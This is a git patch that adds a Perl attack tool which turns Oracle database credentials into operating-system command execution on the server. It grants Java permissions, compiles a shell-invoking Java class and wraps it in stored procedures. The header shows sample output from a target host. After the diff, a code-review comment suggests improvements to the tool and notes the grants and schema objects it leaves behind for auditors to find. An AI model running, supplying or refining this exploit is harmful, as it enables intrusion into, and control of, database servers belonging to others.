From c95bae8ed4de0ada4ac5135103664b1f5529d84d Mon Sep 17 00:00:00 2001
From: 0c0c0f <892850447@qq.com>
Date: Fri, 23 Dec 2016 15:24:40 +0800
Subject: [PATCH] Create ora_exec_cmd.pl

https://github.com/bunk3r/ora-exec-cmd
---
 service/ora_exec_cmd.pl | 192 ++++++++++++++++++++++++++++++++++++++++
 1 file changed, 192 insertions(+)
 create mode 100644 service/ora_exec_cmd.pl

diff --git a/service/ora_exec_cmd.pl b/service/ora_exec_cmd.pl
new file mode 100644
index 0000000..22c1518
--- /dev/null
+++ b/service/ora_exec_cmd.pl
@@ -0,0 +1,192 @@
+#!/usr/bin/perl
+#
+# Execute remote operating system commands from Oracle connection
+#
+# Author:
+# Andrea "bunker" Purificato
+# http://www.purificato.org
+#
+# Updated on Wed Mar 7 10:24:58 CET 2007
+#
+# Oracle InstantClient (basic + sdk) required for DBD::Oracle
+#
+#
+# $ perl ora_exec_cmd.pl -h 192.168.97.187 -s prova -u sfigato -p password -c 'dir c:\'
+# [-] Setting permissions...
+# [-] Creating Java class...
+# [-] Creating function...
+# [-] Creating procedure...
+# [-] Exec: (dir c:\)
+# Volume in drive C is Stub
+# Volume Serial Number is 809D-4AC5
+#
+# Directory of c:\
+# Process out:
+# 2007-01-24 11.27 1 024 .rnd
+# 2006-09-29 17.04 0 AUTOEXEC.BAT
+# 2006-09-29 17.04 0 CONFIG.SYS
+# 2006-11-14 10.05 cygwin
+# 2006-09-29 17.10 Documents and Settings
+# 2006-12-05 12.27 126 nessuswx.dbg
+# 2007-02-07 17.06 0 netstat.txt
+# 2006-10-27 14.47 Oracle
+# 2007-02-05 16.02 Program Files
+# 2007-02-07 09.41 WINDOWS
+# 2006-10-27 09.52 Xindice
+# 6 File(s) 1 150 bytes
+# 6 Dir(s) 7 859 896 320 bytes free
+#
+use warnings;
+use strict;
+use DBI;
+use Getopt::Std;
+use vars qw/ %opt /;
+
+sub usage {
+ print <<"USAGE";
+
+Syntax: $0 -h -s -u -p [-P ] [-b] -c ''
+Options:
+ -h target server address
+ -s target sid name
+ -u username
+ -p password
+
+ [-P Oracle port]
+ [-b bypass creation of evil functions]
+ -c command
+
+USAGE
+ exit 0
+}
+
+my $opt_string = 'h:s:u:p:c:P:b';
+getopts($opt_string, \%opt) or &usage;
+&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} or !$opt{c});
+
+my $user = uc $opt{u};
+
+my $dbh = undef;
+if ($opt{P}) {
+ $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
+} else {
+ $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
+}
+
+$dbh->{RaiseError} = 1;
+$dbh->func( 1000000, 'dbms_output_enable' );
+
+unless($opt{b}) {
+ print "[-] Setting permissions...\n";
+ my $sth = $dbh->prepare("
+ BEGIN
+ dbms_java.grant_Permission('$user', 'java.io.FilePermission', '<>', 'read ,write, execute, delete');
+ dbms_java.grant_Permission('$user', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
+ dbms_java.grant_Permission('$user', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');
+ END;
+ ");
+ $sth->execute;
+
+ print "[-] Creating Java class...\n";
+ $sth = $dbh->prepare('
+ create or replace and compile java source named "Util" as
+ import java.io.*;
+ public class Util {
+ public static void runthis(String command) {
+ try {
+ String[] fCmd;
+ if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) {
+ fCmd = new String[3];
+ fCmd[0] = "C:\\\\windows\\\\system32\\\\cmd.exe"; // XP/2003
+ //fCmd[0] = "C:\\\\winnt\\\\system32\\\\cmd.exe"; // NT/2000
+ fCmd[1] = "/c";
+ fCmd[2] = command;
+ }
+ else {
+ fCmd = new String[3];
+ fCmd[0] = "/bin/sh";
+ fCmd[1] = "-c";
+ fCmd[2] = command;
+ }
+ final Process pr = Runtime.getRuntime().exec(fCmd);
+ pr.waitFor();
+ new Thread(new Runnable(){
+ public void run() {
+ BufferedReader br_in = null;
+ try {
+ br_in = new BufferedReader(new InputStreamReader(pr.getInputStream()));
+ String buff = null;
+ while ((buff = br_in.readLine()) != null) {
+ System.out.println(buff);
+ try {Thread.sleep(100); } catch(Exception e) {}
+ }
+ br_in.close();
+ }
+ catch (IOException ioe) {
+ System.out.println("Exception caught printing process output.");
+ ioe.printStackTrace();
+ }
+ finally { try { br_in.close(); } catch (Exception ex) {} }
+ }
+ }).start();
+ new Thread(new Runnable(){
+ public void run() {
+ BufferedReader br_err = null;
+ try {
+ br_err = new BufferedReader(new InputStreamReader(pr.getErrorStream()));
+ String buff = null;
+ while ((buff = br_err.readLine()) != null) {
+ System.out.println("Error: " + buff);
+ try {Thread.sleep(100); } catch(Exception e) {}
+ }
+ br_err.close();
+ }
+ catch (IOException ioe) {
+ System.out.println("Exception caught printing process error.");
+ ioe.printStackTrace();
+ }
+ finally { try { br_err.close(); } catch (Exception ex) {} }
+ }
+ }).start();
+ }
+ catch (Exception ex) {
+ System.out.println(ex.getLocalizedMessage());
+ }
+ }
+ };
+ ');
+ $sth->execute;
+
+ print "[-] Creating function...\n";
+ $sth = $dbh->prepare(q{
+ create or replace function run_cmd( p_cmd in varchar2) return number as
+ language java
+ name 'Util.runthis(java.lang.String) return integer';
+ });
+ $sth->execute;
+
+ print "[-] Creating procedure...\n";
+ $dbh->do('
+ create or replace procedure rc(p_cmd in varchar2) as
+ x number;
+ begin
+ x := run_cmd(p_cmd);
+ end;');
+}
+
+print "[-] Exec: ($opt{c})\n";
+my $sth = $dbh->prepare(qq{
+begin
+ DBMS_JAVA.SET_OUTPUT(1000000);
+ rc('$opt{c}');
+end;
+});
+$sth->execute;
+
+while (my $line = $dbh->func( 'dbms_output_get' )) {
+ print "$line\n";
+}
+
+$sth->finish;
+$dbh->disconnect;
+exit;
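Review bot: The option and connection handling in this hunk uses obsolete idioms: `use vars qw/ %opt /;` should be `my %opt;`, the two `&usage` calls should be `usage()`, and both `DBI->connect(...) or die;` lines die silently — `or die "connect: $DBI::errstr";` would tell the operator why the connection failed. The `dbms_java.grant_Permission` calls and the `Util`, `run_cmd` and `rc` objects are created but never revoked or dropped, so every run leaves persistent grants and schema objects behind; `-b` only skips re-creation, and the header comment should say so, since that residue is what an audit of the target schema will find afterwards. Passing the password via `-p` exposes it in the process list and shell history; the usual fix is to read it from a prompt or an environment variable.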